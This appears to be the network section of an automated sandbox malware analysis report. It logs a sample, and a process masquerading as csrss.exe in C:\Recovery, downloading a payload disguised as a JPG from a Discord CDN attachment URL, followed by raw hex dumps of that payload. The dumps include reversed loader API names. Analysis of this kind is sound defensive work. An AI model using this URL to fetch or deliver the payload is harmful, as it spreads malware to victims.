                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  Cache-Control: max-age=3600
                                                  Expires: Sat, 23 Apr 2022 07:15:40 GMT
                                                  Location: https://cdn.discordapp.com/attachments/932607293869146142/941782821578633216/Sjxupcet.jpg
                                                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JZ4L3vDnJhgNNqJc%2FuXWNWQhyarp6FU%2B7aVBWuNaqYjDx3zmLZQQkMQZxBGySOUAXGvhqpF9EStzUwGfRBS0Q7z9RcDTICKj0i7aTOS%2FiycNZypqxsP66goHb%2FTkIrtveq2ZcQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 7004774b888268ec-FRA
                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                  Data Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  2192.168.2.649723162.159.133.233443C:\Recovery\csrss.exe
                                                  TimestampkBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  3192.168.2.649725162.159.129.233443C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe
                                                  TimestampkBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  4192.168.2.649727162.159.129.233443C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe
                                                  TimestampkBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  5192.168.2.649729162.159.133.233443C:\Recovery\csrss.exe
                                                  TimestampkBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  6192.168.2.649715162.159.129.23380C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Apr 23, 2022 08:13:00.634634972 CEST1OUTGET /attachments/932607293869146142/941782821578633216/Sjxupcet.jpg HTTP/1.1
                                                  Host: cdn.discordapp.com
                                                  Connection: Keep-Alive
                                                  Apr 23, 2022 08:13:00.657365084 CEST2INHTTP/1.1 301 Moved Permanently
                                                  Date: Sat, 23 Apr 2022 06:13:00 GMT
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  Cache-Control: max-age=3600
                                                  Expires: Sat, 23 Apr 2022 07:13:00 GMT
                                                  Location: https://cdn.discordapp.com/attachments/932607293869146142/941782821578633216/Sjxupcet.jpg
                                                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vxvMfnASFJMrTedNjNhKiurAO1TmhCPxFDv1OXHlb3I7%2FLmrwcDLBbOdKber2AWCX%2Bjl3P0c5%2F4oh82Pc9yqJrfY12VjrXEqvTQ4GHmM%2FNwzTEd6GPOcMM4HF%2B4oRjspM6%2BAsw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 7004736708479a30-FRA
                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                  Data Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  7192.168.2.649720162.159.133.23380C:\Recovery\csrss.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Apr 23, 2022 08:14:38.053694010 CEST420OUTGET /attachments/932607293869146142/941782821578633216/Sjxupcet.jpg HTTP/1.1
                                                  Host: cdn.discordapp.com
                                                  Connection: Keep-Alive
                                                  Apr 23, 2022 08:14:38.077887058 CEST421INHTTP/1.1 301 Moved Permanently
                                                  Date: Sat, 23 Apr 2022 06:14:38 GMT
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  Cache-Control: max-age=3600
                                                  Expires: Sat, 23 Apr 2022 07:14:38 GMT
                                                  Location: https://cdn.discordapp.com/attachments/932607293869146142/941782821578633216/Sjxupcet.jpg
                                                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=07KPUbrYhk2pgWIa5tSUz%2BnHg9Scvzck4Rudx2L2YKJ9cj6qKts5IgPv2RCwFlsb%2Bt4m3NlYhx43BN2cZRrIbl87X%2Bba9UYJ9jWPeaiF8rsmfBLDHj8vj%2BCJ5mfouaSuEXKmIA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 700475c7ef055bf5-FRA
                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                  Data Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  8192.168.2.649722162.159.133.23380C:\Recovery\csrss.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Apr 23, 2022 08:14:56.134154081 CEST820OUTGET /attachments/932607293869146142/941782821578633216/Sjxupcet.jpg HTTP/1.1
                                                  Host: cdn.discordapp.com
                                                  Connection: Keep-Alive
                                                  Apr 23, 2022 08:14:56.156723022 CEST821INHTTP/1.1 301 Moved Permanently
                                                  Date: Sat, 23 Apr 2022 06:14:56 GMT
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  Cache-Control: max-age=3600
                                                  Expires: Sat, 23 Apr 2022 07:14:56 GMT
                                                  Location: https://cdn.discordapp.com/attachments/932607293869146142/941782821578633216/Sjxupcet.jpg
                                                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jOEoZoqRa%2FNcfwJ51q4wv6OkLM05oWewrGi9RvSS6qmpDrykoYaC8SOmpNXsIua%2BjiKlWD6jFKxWidp9VFBDqAJ0ndMzmy5J0Lu5mBkzjS37%2BbxYcDRsJwnqON72mPiBXiAKZg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 70047638ed139143-FRA
                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                  Data Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  9192.168.2.649724162.159.129.23380C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Apr 23, 2022 08:14:56.959830046 CEST826OUTGET /attachments/932607293869146142/941782821578633216/Sjxupcet.jpg HTTP/1.1
                                                  Host: cdn.discordapp.com
                                                  Connection: Keep-Alive
                                                  Apr 23, 2022 08:14:56.981148005 CEST827INHTTP/1.1 301 Moved Permanently
                                                  Date: Sat, 23 Apr 2022 06:14:56 GMT
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  Cache-Control: max-age=3600
                                                  Expires: Sat, 23 Apr 2022 07:14:56 GMT
                                                  Location: https://cdn.discordapp.com/attachments/932607293869146142/941782821578633216/Sjxupcet.jpg
                                                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xRyTj3kW297ycjddQk4v0%2BTPSCkuoAGKxsj2rY7DNUmLGHVXhjaTyMCXU5EBOu5h278Zb5du92RiXJtwC2J%2ByRfUua%2BO0p1EcVQ12NiiPtSYJN1YmlRUAemI57yiup%2Fxq1s3XA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 7004763e08009b64-FRA
                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                  Data Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  0192.168.2.649716162.159.129.233443C:\Users\user\Desktop\64AE5410F978DF0F48DCC67508820EA230C566967E002.exe
                                                  TimestampkBytes transferredDirectionData
                                                  2022-04-23 06:13:01 UTC0OUTGET /attachments/932607293869146142/941782821578633216/Sjxupcet.jpg HTTP/1.1
                                                  Host: cdn.discordapp.com
                                                  Connection: Keep-Alive
                                                  2022-04-23 06:13:01 UTC0INHTTP/1.1 200 OK
                                                  Date: Sat, 23 Apr 2022 06:13:01 GMT
                                                  Content-Type: image/jpeg
                                                  Content-Length: 387072
                                                  Connection: close
                                                  CF-Ray: 7004736c0ded5ca4-FRA
                                                  Accept-Ranges: bytes
                                                  Age: 350
                                                  Cache-Control: public, max-age=31536000
                                                  ETag: "fce090eab4bfe6a3d63ebc34f3979aaf"
                                                  Expires: Sun, 23 Apr 2023 06:13:01 GMT
                                                  Last-Modified: Fri, 11 Feb 2022 19:48:42 GMT
                                                  Vary: Accept-Encoding
                                                  CF-Cache-Status: HIT
                                                  Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                  Cf-Bgj: h2pri
                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                  x-goog-generation: 1644608922184980
                                                  x-goog-hash: crc32c=wezq3g==
                                                  x-goog-hash: md5=/OCQ6rS/5qPWPrw085earw==
                                                  x-goog-metageneration: 1
                                                  x-goog-storage-class: STANDARD
                                                  x-goog-stored-content-encoding: identity
                                                  x-goog-stored-content-length: 387072
                                                  X-GUploader-UploadID: ADPycdtKqfssV5gXSEkEU-GSIerpxp8CHIbDYFk25SOnHq78HplyaMuQo1jVekgXmuj72goZFfCtCGw0Rr6hHXhhv5O64hS4RUso
                                                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gmfQRtKf4L2Cb4XeyAUJ2pYfmrDeIUlc5%2BSL3JeZz9%2BsYXYRfYtig5ze7Isqe2L3OvCJkJzAOv1wmG688waY6xn89bGKhaZ6m4R3PkuEp2%2Bqv9XcrONNuO7Qa2SsPR93DImumw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  2022-04-23 06:13:01 UTC1INData Raw: 00 00
                                                  Data Ascii:
                                                  2022-04-23 06:13:01 UTC1INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  2022-04-23 06:13:01 UTC2INData Raw: 02 00 00 00 04 00 00 00 00 00 00 00 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 fe ef 04 bd 00 00 00 00 00 4f 00 46 00 4e 00 49 00 5f 00 4e 00 4f 00 49 00 53 00 52 00 45 00 56 00 5f 00 53 00 56 00 00 00 34 02 e4 00 00 00 00 00 00 00 00 00 00 02 e4 00 06 00 58 00 00 00 48 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 30 00 00 00 01 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 18 00 00 00 10 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii: ?OFNI_NOISREV_SV4XH0
                                                  2022-04-23 06:13:01 UTC4INData Raw: 18 02 18 03 07 05 ed 81 11 35 12 01 02 00 08 05 1d 02 05 1d 02 18 08 06 07 0a 18 05 1d 02 07 05 0e 0e 02 07 04 a9 80 12 00 20 05 18 00 20 03 a1 80 12 00 00 05 02 02 02 02 e9 80 12 a5 80 12 75 12 02 08 07 0f 7d 12 0e 05 1d 02 20 07 0e 1d 0e 01 00 05 89 80 11 00 20 05 89 80 11 00 00 05 69 81 11 01 01 00 06 89 80 11 02 7d 12 71 81 12 02 05 07 0c 9c 80 12 01 07 05 08 08 0e 02 20 05 03 08 01 20 04 0e 0e 08 0e 08 0e 94 80 12 07 07 0b 1c 0e 0e 02 00 05 0d 00 20 03 49 82 11 00 20 05 bd 80 12 00 00 05 49 82 11 08 08 bd 80 12 04 07 0a 21 81 11 08 25 81 11 11 81 11 1d 81 11 0e 01 06 20 11 08 08 05 1d 0e 03 20 07 0e 01 01 00 04 02 0e 02 03 07 05 05 1d 0e 01 02 00 06 d5 80 11 0e 01 00 06 0e 01 81 12 01 00 06 98 80 11 0e 0e 0e 04 07 08 05 1d 08 39 81 12 03 07 08 05 01
                                                  Data Ascii: 5 u} i}q I I!% 9
                                                  2022-04-23 06:13:01 UTC5INData Raw: 08 72 65 64 6c 69 75 42 65 63 72 75 6f 73 65 52 64 65 70 79 54 79 6c 67 6e 6f 72 74 53 2e 73 6c 6f 6f 54 2e 73 65 63 72 75 6f 73 65 52 2e 6d 65 74 73 79 53 33 00 01 41 00 00 00 00 00 15 00 01 08 00 00 00 00 00 14 00 01 08 00 00 00 00 00 13 00 01 08 0e 1d 00 28 04 00 00 00 00 00 12 00 01 08 00 00 00 00 00 11 00 01 08 24 11 00 28 04 00 00 00 00 00 10 00 01 08 00 00 00 00 00 0f 00 01 08 00 00 00 00 00 0e 00 01 08 b8 80 12 00 28 05 00 00 00 00 00 0d 00 01 08 00 00 00 00 00 0c 00 01 08 00 00 00 00 00 0b 00 01 08 00 00 00 00 00 0a 00 01 08 00 00 00 00 00 09 00 01 08 00 00 00 00 00 08 00 01 08 00 00 00 00 00 07 00 01 08 0c 81 12 00 28 05 00 00 00 00 00 06 00 01 08 60 12 00 28 04 08 00 28 03 ac 80 11 00 28 05 4c 11 00 28 04 d5 81 11 01 01 20 06 00 00 00 00 00 05
                                                  Data Ascii: redliuBecruoseRdepyTylgnortS.slooT.secruoseR.metsyS3A($(((`(((L(
                                                  2022-04-23 06:13:01 UTC6INData Raw: 01 20 06 1c 39 12 18 e5 80 12 03 20 09 18 18 01 20 04 02 10 18 02 02 00 06 02 0e 0e 02 03 00 06 09 10 09 19 18 02 04 00 08 0e 10 18 18 02 00 06 22 01 0e 10 18 01 00 05 09 10 09 18 18 02 04 00 08 08 2d 82 12 18 18 09 04 00 09 18 02 01 00 04 02 01 18 02 78 11 18 03 00 07 08 01 08 2a 02 09 10 09 18 1d 02 03 00 08 2d 82 12 18 09 18 18 04 00 09 08 2d 82 12 18 08 03 00 08 c5 80 11 10 08 0a 02 00 08 08 70 12 08 02 03 00 07 08 10 08 08 02 00 06 08 2d 82 12 08 01 03 00 08 08 08 08 18 18 04 00 07 08 08 2d 82 12 08 08 08 05 00 0a 08 00 00 03 6c 11 08 01 00 05 68 12 06 03 05 1d 01 01 20 05 05 1d 00 20 04 0e 00 20 03 02 01 01 20 04 05 1d 06 03 e5 80 12 02 01 20 06 1c 39 12 08 e5 80 12 03 20 09 08 02 01 20 04 18 1c 01 02 20 05 08 08 02 02 20 05 5c 12 25 82 12 25 82 12
                                                  Data Ascii: 9 "-x*--p--lh 9 \%%
                                                  2022-04-23 06:13:01 UTC8INData Raw: 77 6f 4e 5f 74 65 67 00 65 6d 61 4e 72 65 73 55 5f 74 65 67 00 6c 6f 63 6f 74 6f 72 50 79 74 69 72 75 63 65 53 5f 74 65 73 00 66 4f 78 65 64 6e 49 00 6e 69 4d 00 74 61 6d 72 6f 46 00 73 64 6e 6f 63 65 53 6c 61 74 6f 54 5f 74 65 67 00 64 65 73 70 61 6c 45 5f 74 65 67 00 77 65 4e 74 72 61 74 53 00 65 6d 61 4e 79 72 6f 74 63 65 72 69 44 74 65 47 00 65 74 65 6c 65 44 00 73 65 74 79 42 6c 6c 41 65 74 69 72 57 00 68 74 61 50 72 65 64 6c 6f 46 74 65 47 00 79 72 6f 74 63 65 72 69 44 65 74 61 65 72 43 00 68 74 61 50 70 6d 65 54 74 65 47 00 64 6e 65 70 70 41 00 67 6e 69 72 74 73 62 75 53 00 68 74 69 57 73 74 72 61 74 53 00 6d 69 72 54 00 6d 6f 72 46 64 61 6f 4c 00 67 6e 69 72 74 53 34 36 65 73 61 42 6f 54 00 74 6e 61 69 72 61 76 6e 49 72 65 70 70 55 6f 54 00 65 70
                                                  Data Ascii: woN_tegemaNresU_teglocotorPytiruceS_tesfOxednIniMtamroFsdnoceSlatoT_tegdespalE_tegweNtratSemaNyrotceriDteGeteleDsetyBllAetirWhtaPredloFteGyrotceriDetaerChtaPpmeTteGdneppAgnirtsbuShtiWstratSmirTmorFdaoLgnirtS46esaBoTtnairavnIreppUoTep
                                                  2022-04-23 06:13:01 UTC9INData Raw: 4d 74 65 47 00 73 65 6c 75 64 6f 4d 73 73 65 63 6f 72 50 6d 75 6e 45 00 78 45 65 6d 61 4e 65 6c 69 46 65 6c 75 64 6f 4d 74 65 47 00 65 6c 64 6e 61 48 65 73 6f 6c 43 00 73 73 65 63 6f 72 50 6e 65 70 4f 00 73 65 73 73 65 63 6f 72 50 6d 75 6e 45 00 65 67 61 73 73 65 4d 64 6e 65 53 00 74 78 65 54 77 6f 64 6e 69 57 74 65 47 00 74 63 65 52 77 6f 64 6e 69 57 74 65 47 00 73 77 6f 64 6e 69 57 64 6c 69 68 43 6d 75 6e 45 00 64 49 73 73 65 63 6f 72 50 64 61 65 72 68 54 77 6f 64 6e 69 57 74 65 47 00 65 6d 61 4e 73 73 61 6c 43 74 65 47 00 63 6f 6c 6c 41 6c 61 75 74 72 69 56 00 6f 66 6e 49 6f 65 47 74 65 47 00 44 49 43 4c 74 6c 75 61 66 65 44 72 65 73 55 74 65 47 00 44 49 6f 65 47 72 65 73 55 74 65 47 00 61 00 6c 6f 64 71 67 6b 4d 00 02 80 80 e2 88 80 e2 8b 80 e2 8b 80
                                                  Data Ascii: MteGseludoMssecorPmunExEemaNeliFeludoMteGeldnaHesolCssecorPnepOsessecorPmunEegasseMdneStxeTwodniWteGtceRwodniWteGswodniWdlihCmunEdIssecorPdaerhTwodniWteGemaNssalCteGcollAlautriVofnIoeGteGDICLtluafeDresUteGDIoeGresUteGalodqgkM
                                                  2022-04-23 06:13:01 UTC10INData Raw: 75 52 2e 6d 65 74 73 79 53 00 65 74 75 62 69 72 74 74 41 6b 72 6f 77 65 6d 61 72 46 74 65 67 72 61 54 00 65 74 75 62 69 72 74 74 41 72 65 74 6e 69 6f 50 6e 6f 69 74 63 6e 75 46 64 65 67 61 6e 61 6d 6e 55 00 74 6e 65 6d 6e 6f 72 69 76 6e 45 65 6d 69 74 6e 75 52 00 6c 61 68 73 72 61 4d 00 65 74 75 62 69 72 74 74 41 65 6c 62 69 73 69 56 6d 6f 43 00 73 65 63 69 76 72 65 53 70 6f 72 65 74 6e 49 2e 65 6d 69 74 6e 75 52 2e 6d 65 74 73 79 53 00 6e 6f 69 74 6e 65 76 6e 6f 43 67 6e 69 6c 6c 61 43 00 73 72 65 70 6c 65 48 65 6d 69 74 6e 75 52 00 65 74 75 62 69 72 74 74 41 79 74 69 6c 69 62 69 74 61 70 6d 6f 43 65 6d 69 74 6e 75 52 00 65 6c 69 74 61 6c 6f 56 73 49 00 73 65 63 69 76 72 65 53 72 65 6c 69 70 6d 6f 43 2e 65 6d 69 74 6e 75 52 2e 6d 65 74 73 79 53 00 65 74
                                                  Data Ascii: uR.metsySetubirttAkrowemarFtegraTetubirttAretnioPnoitcnuFdeganamnUtnemnorivnEemitnuRlahsraMetubirttAelbisiVmoCsecivreSporetnI.emitnuR.metsySnoitnevnoCgnillaCsrepleHemitnuRetubirttAytilibitapmoCemitnuRelitaloVsIsecivreSrelipmoC.emitnuR.metsySet
                                                  2022-04-23 06:13:01 UTC12INData Raw: 73 65 63 6f 72 50 00 6e 6f 69 74 63 65 6c 6c 6f 43 65 6c 75 64 6f 4d 73 73 65 63 6f 72 50 00 65 6c 75 64 6f 4d 73 73 65 63 6f 72 50 00 73 73 65 63 6f 72 50 00 65 74 75 62 69 72 74 74 41 65 64 6f 43 72 65 73 55 6e 6f 4e 72 65 67 67 75 62 65 44 00 65 74 75 62 69 72 74 74 41 6e 65 64 64 69 48 72 65 67 67 75 62 65 44 00 65 74 61 74 53 65 6c 62 61 73 77 6f 72 42 72 65 67 67 75 62 65 44 00 73 63 69 74 73 6f 6e 67 61 69 44 2e 6d 65 74 73 79 53 00 65 74 75 62 69 72 74 74 41 65 6c 62 61 73 77 6f 72 42 72 65 67 67 75 62 65 44 00 65 74 61 67 65 6c 65 44 00 65 6d 69 54 65 74 61 44 00 74 72 65 76 6e 6f 43 00 6c 65 64 6f 4d 74 6e 65 6e 6f 70 6d 6f 43 2e 6d 65 74 73 79 53 00 6e 6f 69 74 70 65 63 78 45 32 33 6e 69 57 00 64 65 7a 69 6c 61 69 63 65 70 53 2e 73 6e 6f 69 74
                                                  Data Ascii: secorPnoitcelloCeludoMssecorPeludoMssecorPssecorPetubirttAedoCresUnoNreggubeDetubirttAneddiHreggubeDetatSelbasworBreggubeDscitsongaiD.metsySetubirttAelbasworBreggubeDetageleDemiTetaDtrevnoCledoMtnenopmoC.metsySnoitpecxE23niWdezilaicepS.snoit
                                                  2022-04-23 06:13:01 UTC13INData Raw: 2f 00 31 00 2f 00 30 00 24 00 27 00 24 00 26 00 24 00 25 00 20 00 24 00 20 00 23 00 20 00 22 00 20 00 21 00 19 00 1f 00 19 00 1e 00 19 00 1d 00 19 00 1c 00 19 00 1b 00 19 00 1a 00 16 00 17 00 15 00 16 00 0e 00 0f 00 04 00 07 00 04 00 06 00 04 00 05 00 02 00 03 00 00 00 eb 00 00 00 02 00 05 08 04 00 00 00 ca 00 00 00 02 00 00 00 00 00 00 00 00 00 67 00 01 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 5b 00 01 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 49 00 0a 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 3c 00 13 00 00 00 00 00 00 00 00 00 04 00 02 00 00 00 00 00 35 00 01 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 26 00 0a 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 1d 00 01 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 01
                                                  Data Ascii: /1/0$'$&$% $ # " !g[I<5&
                                                  2022-04-23 06:13:01 UTC14INData Raw: 08 39 08 2b 08 27 08 22 08 1e 00 1f 00 00 00 00 00 01 00 1d 00 00 00 00 00 01 00 07 00 00 00 63 00 01 00 06 00 00 00 0d 00 01 00 05 00 00 00 0c 00 01 02 10 00 c5 02 10 00 c1 01 e6 00 bf 01 e6 00 b7 01 e6 00 af 01 f0 00 a5 01 f0 00 a1 01 e6 00 9d 01 e3 00 99 05 fe 00 64 05 ee 00 1b 14 41 05 ee 00 1b 14 21 05 ee 00 1b 12 81 05 ee 00 1b 12 61 05 ee 00 1b 12 41 05 ee 00 1b 12 21 05 ee 00 1b 12 01 05 ee 00 1b 11 e1 05 ee 00 1b 11 c1 05 ee 00 1b 11 a1 05 ee 00 1b 11 81 05 ee 00 1b 11 61 05 ee 00 1b 11 41 05 ee 00 1b 11 21 05 ee 00 1b 11 01 05 ee 00 1b 10 e1 05 ee 00 1b 10 c1 05 ee 00 1b 10 a1 05 ee 00 1b 10 81 05 ee 00 1b 10 61 05 ee 00 1b 10 41 05 ee 00 1b 10 21 05 ee 00 1b 10 01 00 5c 00 23 0f c0 00 5c 00 23 0f a0 05 ee 00 1b 0f 81 00 5c 00 23 0f 80 05 ee 00
                                                  Data Ascii: 9+'"cdA!aA!aA!aA!\#\#\#
                                                  2022-04-23 06:13:01 UTC16INData Raw: cf 11 98 00 54 04 5a 15 44 04 29 0d ad 12 50 02 81 08 45 15 38 04 41 0d a7 0d 88 04 29 01 76 12 50 04 59 0d a0 13 bc 04 59 09 3c 15 25 03 01 08 87 10 8c 00 54 00 28 0d 88 00 54 00 70 0c 20 00 09 0c f4 15 20 03 b9 00 23 0d 88 01 01 01 8f 15 0e 03 b9 0a 5c 11 8c 02 91 0c e5 14 fe 03 a1 02 e1 14 ec 02 69 00 28 0d 88 02 f9 0c c5 14 dc 01 49 09 42 14 d3 04 29 01 76 14 cb 04 29 01 76 14 bc 01 49 02 c8 0e 0d 00 f1 0c c9 14 b0 01 41 0c c5 14 a5 01 41 0c bf 14 93 01 41 0c a7 14 86 02 e1 0c a1 11 6b 04 29 01 76 10 83 02 59 01 76 12 50 01 11 0c 9b 14 76 01 11 0c 95 14 6e 01 11 02 e1 14 61 01 a1 07 a5 10 b0 00 f9 00 28 0d 88 00 f9 00 28 0d 88 02 e1 0c 8e 14 4c 02 d9 0c 75 13 b2 04 29 0c 70 14 44 04 29 04 a2 14 40 02 c1 00 a8 0d 88 04 99 0c 5e 14 39 04 29 0c 5a 14 28
                                                  Data Ascii: TZD)PE8A)vPYY<%T(Tp #\i(IB)v)vIAAAk)vYvPvna((Lu)pD)@^9)Z(
                                                  2022-04-23 06:13:01 UTC17INData Raw: 00 03 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 9a 00 07 00 00 0c 70 00 06 00 00 0c 6c 00 05 00 00 0c 6e 00 04 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 6c 00 05 00 00 0c 6e 00 04 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 6e 00 04 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 9a 00 07 00 00 0c 70 00 06 00 00 0c 6c 00 05 00 00 0c 6e 00 04 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c
                                                  Data Ascii: pln)' ln)' ' n)' ' ' )' pln)'
                                                  2022-04-23 06:13:01 UTC18INData Raw: 00 0c 6e 00 04 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 20 00 01 00 00 0c 6e 00 04 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 9a 00 07 00 00 0c 70 00 06 00 00 0c 6c 00 05 00 00 0c 6e 00 04 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 6c 00 05 00 00 0c 6e 00 04 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c 29 00 03 00 00 0c 27 00 02 00 00 0c 20 00 01 00 00 0c a1 00 0c 00 00 0c c9 00 0b 00 00 0c 77 00 0a 00 00 0c 49 00 09 00 00 0c 22 00 08 00 00 0c 9a 00 07 00 00 0c 70
                                                  Data Ascii: n)' ' ' n)' ' ' ' pln)' ln)' ' )' wI"p
